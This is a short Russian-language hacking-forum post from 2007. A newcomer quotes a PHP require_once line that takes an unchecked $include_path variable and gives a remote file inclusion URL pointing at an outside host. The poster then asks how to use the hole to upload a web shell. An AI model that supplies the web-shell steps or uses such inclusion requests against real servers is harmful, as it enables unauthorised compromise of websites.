12.11.2007, 23:42
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
Провел на форуме:
3344
Репутация:
0
|
|
Привет, в php скрипте, есть сл. код:
PHP код:
require_once $include_path."/include/config.inc.php";
Переменная "$include_path", никак не проверяется, т.е. я могу выполнить следующее:
target.php?include_path=http://somehost.ru
при условии, что на somehost.ru, есть "/include/config.inc.php".
Насколько я понял, подобная уязвимость описывается тут, но мне не совсем понятно, что нужно делать =/
Вопрос: что с этим делать дальше?
Как можно залить шел? |
|
|